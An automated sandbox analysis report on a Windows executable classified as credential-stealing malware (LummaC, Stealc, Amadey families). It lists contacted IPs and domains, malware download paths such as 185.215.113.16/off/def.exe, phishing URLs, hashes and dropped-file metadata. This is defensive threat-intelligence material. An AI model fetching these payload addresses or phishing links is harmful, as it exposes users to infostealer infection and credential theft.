                                                                                                                                                                    https://channel9.msdn.com/chromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1385234997.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1385298610.00000000058D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://github.com/dotnet/trychromecache_99.6.dr, chromecache_110.6.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000000.00000003.1428816057.0000000001194000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            142.250.185.228
                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                            13.107.246.45
                                                                                                                                                                            s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                            13.107.246.44
                                                                                                                                                                            s-part-0016.t-0009.t-msedge.netUnited States
                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                            185.215.113.16
                                                                                                                                                                            unknownPortugal
                                                                                                                                                                            206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                            13.107.246.60
                                                                                                                                                                            s-part-0032.t-0009.t-msedge.netUnited States
                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                            239.255.255.250
                                                                                                                                                                            unknownReserved
                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                            188.114.96.3
                                                                                                                                                                            cook-rain.sbsEuropean Union
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            IP
                                                                                                                                                                            192.168.2.7
                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                            Analysis ID:1559252
                                                                                                                                                                            Start date and time:2024-11-20 10:53:11 +01:00
                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 7m 42s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                            Number of analysed new started processes analysed:12
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Sample name:file.exe
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@24/64@11/8
                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                            HCA Information:
                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 199.232.210.172, 216.58.206.67, 184.28.89.167, 142.251.168.84, 216.58.212.174, 34.104.35.123, 95.101.150.2, 52.168.117.174, 216.58.206.74, 142.250.186.42, 142.250.186.106, 142.250.186.170, 142.250.185.170, 142.250.186.138, 172.217.23.106, 142.250.184.234, 216.58.212.138, 142.250.185.202, 142.250.185.234, 172.217.16.202, 142.250.186.74, 142.250.185.138, 172.217.18.10, 142.250.185.74, 2.19.126.156, 2.19.126.137, 20.42.73.27, 13.74.129.1, 13.107.21.237, 204.79.197.237, 142.250.185.163, 172.217.16.206
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, time.windows.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, onedscolprdeus12.eastus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, clients.l.google.com, onedscolprdeus22.eastu
                                                                                                                                                                            • Execution Graph export aborted for target file.exe, PID 7724 because there are no executed function
                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • VT rate limit hit for: file.exe
                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                            04:54:19API Interceptor16x Sleep call for process: file.exe modified
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • nam.dcv.ms/BxPVLH2cz4
                                                                                                                                                                            13.107.246.44https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9HMTAuZHpwdndvYnIucnUvdkd5c2dQdC8=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                185.215.113.16file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.16/off/random.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                cook-rain.sbsfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                s-part-0016.t-0009.t-msedge.nethttps://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9HMTAuZHpwdndvYnIucnUvdkd5c2dQdC8=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 13.107.246.44
                                                                                                                                                                                                s-part-0017.t-0009.t-msedge.netCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                https://www.google.ca/url?q=30NUMBER&rct=77151727248916238810&sa=t&url=amp/s/estudioit.cl/starl/%23YW5nZWxhLmhvZGdzb25AMnNmZy5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                215.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                213.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                212.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                s-part-0032.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                Portfolio Review _2024.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSPayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                https://c9amf220.caspio.com/dp/3ba5e0002add93b7ba4f4d22b51dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 150.171.28.10
                                                                                                                                                                                                https://github.com/bambulab/BambuStudio/releases/download/v01.10.01.50/Bambu_Studio_win_public-v01.10.01.50-20241115162711.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.42.16
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                Salary 2025- workers-v1.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.42
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSPayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                https://c9amf220.caspio.com/dp/3ba5e0002add93b7ba4f4d22b51dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 150.171.28.10
                                                                                                                                                                                                https://github.com/bambulab/BambuStudio/releases/download/v01.10.01.50/Bambu_Studio_win_public-v01.10.01.50-20241115162711.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.42.16
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.60
                                                                                                                                                                                                Salary 2025- workers-v1.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.42
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                • 185.215.113.206
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                28a2c9bd18a11de089ef85a160da29e4Doc_Comprovativo_Novembro_xoyx_18-11-2024_79.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                https://c9amf220.caspio.com/dp/3ba5e0002add93b7ba4f4d22b51dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                https://www.google.ca/url?q=30NUMBER&rct=77151727248916238810&sa=t&url=amp/s/estudioit.cl/starl/%23YW5nZWxhLmhvZGdzb25AMnNmZy5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                http://load.webdatahoster.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                https://2kio0wi0iat.freewebhostmost.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 20.109.210.53
                                                                                                                                                                                                • 184.28.90.27
                                                                                                                                                                                                • 13.107.246.45
                                                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                Salary 2025- workers-v1.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                                                No context
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):5644
                                                                                                                                                                                                Entropy (8bit):4.785769732002188
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
